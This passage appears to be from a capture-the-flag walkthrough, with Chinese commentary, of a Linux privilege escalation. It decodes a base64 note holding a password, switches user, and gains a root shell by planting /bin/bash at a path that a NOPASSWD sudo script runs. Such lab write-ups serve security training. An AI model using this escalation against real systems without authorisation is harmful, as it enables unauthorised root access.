➜ ~ echo "RG9udCB3b3JyeSBzYWtldCBvbmUgZGF5IHdlIHdpbGwgcmVhY2ggdG8Kb3VyIGRlc3RpbmF0aW9uIHZlcnkgc29vbi4gQW5kIGlmIHlvdSBmb3JnZXQgCnlvdXIgdXNlcm5hbWUgdGhlbiB1c2UgeW91ciBvbGQgcGFzc3dvcmQKPT0+ICJ0cmlidXRlX3RvX2lwcHNlYyIKClZpY3Rvciw="|base64 -d
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,%
- 切换到saket用户
www-data@ubuntu:/home/saket$ su saket
su saket
Password: tribute_to_ippsec
saket@ubuntu:~$
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$
- 发现
/home/victor/undefeated_victor
不用密码
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$
- 没有
/tmp/challenge
这个文件,把bash拷贝到/tmp/challenge
就可以以victor的权限命令执行了。
saket@ubuntu:~$ pwd
pwd
/home/saket
saket@ubuntu:~$ cp /bin/bash /tmp/challenge
cp /bin/bash /tmp/challenge
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#